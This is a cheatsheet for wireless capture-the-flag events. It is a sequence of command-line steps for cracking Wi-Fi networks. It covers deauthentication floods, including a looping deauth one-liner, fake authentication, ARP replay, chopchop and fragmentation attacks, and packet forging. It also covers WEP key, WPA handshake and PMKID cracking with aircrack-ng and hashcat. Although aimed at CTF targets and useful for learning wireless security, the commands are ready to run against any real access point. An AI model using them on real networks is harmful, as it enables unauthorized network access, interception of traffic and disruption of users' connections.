This cheatsheet is largely for the RF Hacker's Sanctuary Wireless Village Capture The Flag events.
Be familiar with the operating environment. New users should install_pentoo.
Read the man page(s)!
Check the wireless interface(s) and start monitoring mode.
$ airmon-ng
$ airmon-ng start wlan0
Verify that injection tests work.
$ aireplay-ng -9 -e CTF_01 wlan0mon
Find surrounding networks, access points and clients.
$ airodump-ng wlan0mon
Begin collection on target channel, BSSID and recording to file.
$ airodump-ng wlan0mon -c 36 --band a --bssid E0:05:C5:60:2E:65 --ivs -w capture
-cSelect channel number-wWrite to file--bssidMAC address of access point--ivsSave only captured IVs (optional)--bandSelect the wireless band. 'b' and 'g' uses 2.4GHz and 'a' uses 5GHz.
There are different scenarios in which the target network may be configured. These may be access points with or without a client, a client looking for an access point, or compromising an access point via a client. The next section contains some of those known scenarios with procedures.
This scenario is generally straight forward. Use a while true loop for deauthenticating client if necessary.
- Monitor and capture the target network traffic.
$ airodump-ng wlan0mon -c 6 -e CTF_01 --ivs -w capture
- Run the fake authentication attack to associate with the target access point.
$ aireplay-ng -1 100 -o 1 -q 10 -e CTF_01 wlan0mon
- Force the connected client to deauthenticate.
$ aireplay-ng -0 3 -e CTF_01 -c client_mac wlan0mon
- Speed things up with an ARP request replay attack against the target access point.
$ aireplay-ng -3 -e CTF_01 wlan0mon
- Run
aircrack-ngto obtain the WEP key.
If the arp request replay attack isn't working then the -p 0841 attack may be used in its place.
$ aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -e CTF_01 wlan0mon
The access point must be broadcasting data for this to work. This attack works better by adding the -h MAC address.
- Monitor and capture the target network traffic using
airodump-ng. - In a new console execute Fake Authentication attack method.
- In a new console execute Fragmentation or chopchop attack methods.
- Create an arp packet with
packetforge-ng. - Inject the arp packet using
aireplay-ng -2. - Run
aircrack-ngto obtain the WEP key.
WEP access point configured to Shared-Key Authentication (SKA) with client. Use a while true loop for deauthenticating the client.
- Monitor and capture the target network traffic.
$ airodump-ng wlan0mon -c 6 -e CTF_01 -w capture
- Force the connected client to deauthenticate to capture the PRGA XOR keystream.
$ aireplay-ng -0 3 -e CTF_01 -c client_mac wlan0mon
- Run the fake authentication attack with the XOR keystream to associate with the target access point.
$ aireplay-ng -1 100 -o 1 -q 10 -e CTF_01 wlan0mon -y capture-01-9C-EF-D5-FB-51-60.xor
- Speed things up with an ARP request replay attack against the target access point.
$ aireplay-ng -3 -e CTF_01 wlan0mon
- Run
aircrack-ngto obtain the WEP key.
Steps to perform an attack on a WPA/WPA2 access point with clients. The pre-shared (PSK) must be in the wordlists used. There is a bug in versions older than 1.5 where this will fail.
- Monitor and capture the target network traffic.
$ airodump-ng wlan0mon -c 6 -e CTF_01 -w capture
- Force the connected client to deauthenticate to capture the handshake(s).
$ aireplay-ng -0 3 -e CTF_01 -c client_mac wlan0mon
- Run
aircrack-ngto obtain the PSK key.
Begin cracking IVS file on target BSSID (can perform while airodump-ng is writing).
$ aircrack-ng capture-01.ivs --bssid E0:05:C5:60:2E:65
Invoke PTW WEP cracking method method on an arp replay.
$ aircrack-ng -z replay_arp-0309-015802.cap
Set interface to monitor mode.
$ airmon-ng start wlx9cefd5fd1181
Stop monitor mode and restart networking.
$ airmon-ng stop wlan0mon
$ systemctl restart network-manager.service
Checking and kill networking services.
$ airmon-ng check kill
Use -D for 5ghz bands. Attack modes (Numbers can still be used):
--deauthor-0--fakeauthor-1--interactiveor-2--arpreplayor-3--chopchopor-4--fragmentor-5--testor-9
Set attack mode Deauthentication.
-0Set fordeauthenticationmode-eTarget access point ESSID-aTarget access point MAC address-cSet destination MAC address
$ aireplay-ng -0 5 -e CTF_01 -a 9C:EF:D5:FB:51:60 -c client_mac wlan0mon
Set attack mode Fake authentication.
-1Set for fake authentication attack180Reassociation timing in seconds-oNumber of packets to send at a time-qFrequency to send keep-alive packets-eTarget access point network name-aTarget access point MAC address-hOur wireless card's MAC address
$ aireplay-ng -1 180 -o 1 -q 10 -e CTF_01 -a 9C:EF:D5:FB:51:60 -h our_mac wlan0mon
Set attack mode Interactive packet replay.
-2Set for interactive packet replay attack mode-rARP file to replay
$ aireplay-ng -2 -r arp-request wlan0mon
Set attack mode ARP request replay attack.
-3Set for ARP request replay attack mode-xNumber of packets-per-second-rExtract packets from target pcap file-bTarget access point BSSID-hSet source MAC address
$ aireplay-ng -3 -x 100 -r replay.cap -b 9C:EF:D5:FB:51:60 -h our_mac wlan0mon
Set attack mode Korek chopchop.
-4Set for chopchop attack-bTarget access point MAC address-hOur wireless card's MAC address
$ aireplay-ng -4 -b 9C:EF:D5:FB:51:60 -h our_mac wlan0mon
Set attack mode Fragmentation.
-5Set for chopchop attack-bTarget access point MAC address-hOur wireless card's MAC address
$ aireplay-ng -5 -b 9C:EF:D5:FB:51:60 -h our_mac wlan0mon
Generate packets for injection from PRGA capture.
Summary of different modes:
--arpor-0for ARP packet--udpor-1for UDP packet--icmpor-2for ICMP packet--nullor-3for a null packet--customor-9for a custom packet
Additional example:
-0Set for generate arp packet-aTarget access point MAC address-hOur wireless card's MAC address-kDestination IP address (255.255.255.255)-lSource IP address (255.255.255.255)-yXOR file to read the PRGA from-wWrite to file
$ packetforge-ng -0 -a 9C:EF:D5:FB:51:60 -h our_mac -k 255.255.255.255 -l 255.255.255.255 -y file.xor -w arp-request
airolib-ng is the database to store essid's, captured PMKs, import password lists and accelerate handshake cracking. Create database and import essid file.
$ airolib-ng CTF --import essid CTF_essids
Import password list(s).
$ airolib-ng CTF --import passwd /usr/share/wordlists/cyberpunk.words
Begin batch processing of passwords to essid's.
$ airolib-ng CTF --batch
This technique requires a slightly different approach and is used against PSK networks. Set up the interface below.
$ ip link set wlan0mon down
$ iwconfig wlan0mon mode monitor
$ ip link set wlan0mon up
Save the target BSSIDs to a file. Begin capturing with filtered parameters.
$ hcxdumptool -i wlan0mon --enable_status -c 1 -o capture.pcapng --filterlist=filter_list --filtermode=2
Section not finished.
Use hcxpcaptool to extract the PMK hash IDs.
$ hcxpcaptool -k pmkidhash capture.cap
Run hashcat to attempt to decrypt the PMK hash IDs.
$ hashcat -m 16800 pmkidhash /usr/share/wordlists/cyberpunk.words --force
wifite is a tool that automates the process. No instructions, read the man page.
Loop deauthentication attack to target client.
$ while true; do sleep 10 && aireplay-ng -0 1 -e CTF_01 -c sta_mac wlan0mon; done
Filter target ESSIDs.
$ airodump-ng wlan0mon --essid-regex "^(CTF_01).*$"
$ airodump-ng wlan0mon --essid-regex ^.*(one|two|three).*$"
$ airodump-ng wlan0mon --essid-regex "CTF_([0-9]{1,2}|W.*)"
Set link up or down.
$ ip link set wlan0mon down
$ ip link set wlan0mon up
Set modes monitor or managed.
$ iw wlan0mon set type managed
$ iw wlan0mon set type monitor
Set interface channel
$ iw dev wlan0mon set channel 6
Using Wireshark to filter target packets.
wlan.addr == target_mac && wlan.fc.type_subtype == 0x08 || wlan.fc.type_subtype == 0x05 || eapol
Using tshark to extract the handshakes.
$ tshark -r filter.pcap -R "(wlan.fc.type_subtype == 0x08 || wlan.fc.type_subtype == 0x05 || eapol) && wlan.addr == 9C:EF:D5:FB:51:60" -2